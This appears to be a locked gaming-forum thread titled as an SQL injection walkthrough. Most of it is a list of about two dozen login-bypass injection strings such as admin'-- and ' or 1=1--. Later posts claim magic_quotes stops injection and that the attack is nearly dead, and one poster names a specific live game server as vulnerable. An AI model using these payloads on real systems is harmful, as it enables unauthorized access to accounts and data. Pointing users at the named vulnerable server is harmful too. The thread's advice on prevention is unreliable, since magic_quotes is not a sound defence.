[Guide] SQL Injection Walkthough

[l0c4lh05t]

Some more Sql injections:

 

admin'--

 

' or 0=0 --

 

" or 0=0 --

 

or 0=0 --

 

' or 0=0 #

 

" or 0=0 #

 

or 0=0 #

 

' or 'x'='x

 

" or "x"="x

 

') or ('x'='x

 

' or 1=1--

 

" or 1=1--

 

or 1=1--

 

' or a=a--

 

" or "a"="a

 

') or ('a'='a

 

") or ("a"="a

 

hi" or "a"="a

 

hi" or 1=1 --

 

hi' or 1=1 --

 

hi' or 'a'='a

 

hi') or ('a'='a

 

hi") or ("a"="a

 

Thnx for the topic.  :D

 

Most senseless posting I ever have seen! It's just

 

' or anything=anything--

 

anything must equal anything - that's ALL, you don't post an totally new way to use SQL injections by giving tons of examples!

 

All in all there are just two ways to use SQL injections:

* using another "equal"-statement (like ' or bla=bla--)

* using the UNION-function which combines two SQL-commands

 

In PHP there are some simple functions to prevent using more than one equal statements like the "magic_quotes". UNION can be detected easily, too.

 

How ever SQL injection is almost dead, because every good PHP-scripter knows how to prevent it!

[lostos]

Yes, exactly, and even those noob 13 yo server owners, have ready-made websites. They don't have to know any php. However, l2tg server (http://l2.thegame.gr) is powered by IPB 2.2.2 and it is vulnerable as explained here.

[Banana Joe]

what is this?

[eKoIce]

On 7/12/2007 at 2:27 PM, Banana Joe said:

what is this?

 

Banana Joe, this is a PURE old thread

 

unfortunatelly , here isn't allowed.

 

1st warn forf you.

 

also..

 

*topic Locked*

Edited August 25, 2021 by Vision